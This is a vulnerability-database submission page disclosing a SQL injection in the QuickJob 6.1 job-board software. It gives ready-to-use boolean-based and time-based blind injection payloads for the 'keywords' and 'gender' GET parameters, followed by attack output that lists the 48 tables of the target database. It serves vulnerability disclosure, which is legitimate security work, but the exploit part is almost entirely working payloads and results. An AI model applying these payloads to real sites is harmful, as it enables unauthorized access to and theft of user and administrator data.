Submit #179268: QuickJob 6.1 - SQL Injectioninfo

Title	QuickJob 6.1 - SQL Injection
Description	# Exploit Title: QuickJob 6.1 - SQL Injection # Date: 07/07/2023 # Exploit Author: skalvin aka (CraCkEr) # Vendor: bylancer # Vendor Homepage: https://bylancer.com/ # Software Link: https://quickjob.bylancer.com # Version: 6.1 # Tested on: Windows 10 Pro # Impact: Database Access Release Notes: SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /listing https://website/job-seekers?keywords=[SQLI]&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender=[SQLI] GET parameter 'keywords' is vulnerable to SQL Injection --- Parameter: keywords (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keywords=' AND 08186=8186 OR '04586'='4586&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender= Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: keywords='XOR(IF(now()=sysdate(),SLEEP(9),0))XOR'Z&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender= --- GET parameter 'gender' is vulnerable to SQL Injection --- Parameter: gender (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z --- [+] Starting the Attack fetching current database current database: 'quickjob_**' fetching tables [48 tables] +---------------------------+ \| job_logs \| \| job_blog \| \| job_currencies \| \| job_user \| \| job_emailq \| \| job_custom_fields \| \| job_notification \| \| job_reviews \| \| job_testimonials \| \| job_user_applied \| \| job_countries \| \| job_product_resubmit \| \| job_category_translation \| \| job_favads \| \| job_experiences \| \| job_blog_categories \| \| job_faq_entries \| \| job_subadmin1 \| \| job_cities \| \| job_push_notification \| \| job_product \| \| job_upgrades \| \| job_catagory_sub \| \| job_messages \| \| job_catagory_main \| \| job_firebase_device_token \| \| job_time_zones \| \| job_blog_comment \| \| job_custom_options \| \| job_payments \| \| job_adsense \| \| job_blog_cat_relation \| \| job_languages \| \| job_custom_data \| \| job_pages \| \| job_companies \| \| job_balance \| \| job_login_attempts \| \| job_subscriptions \| \| job_fav_users \| \| job_admins \| \| job_resumes \| \| job_product_type \| \| job_salary_type \| \| job_transaction \| \| job_options \| \| job_usergroups \| \| job_subadmin2 \| +---------------------------+ [-] Done
User	skalvin (UID 49463)
Submission	07/07/2023 20:28 (3 years ago)
Moderation	07/15/2023 18:24 (8 days later)
Status	Accepted
VulDB entry	234234 [Bylancer QuickJob 6.1 GET Parameter keywords/gender sql injection]
Points	17

◂ Previous Overview Next ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!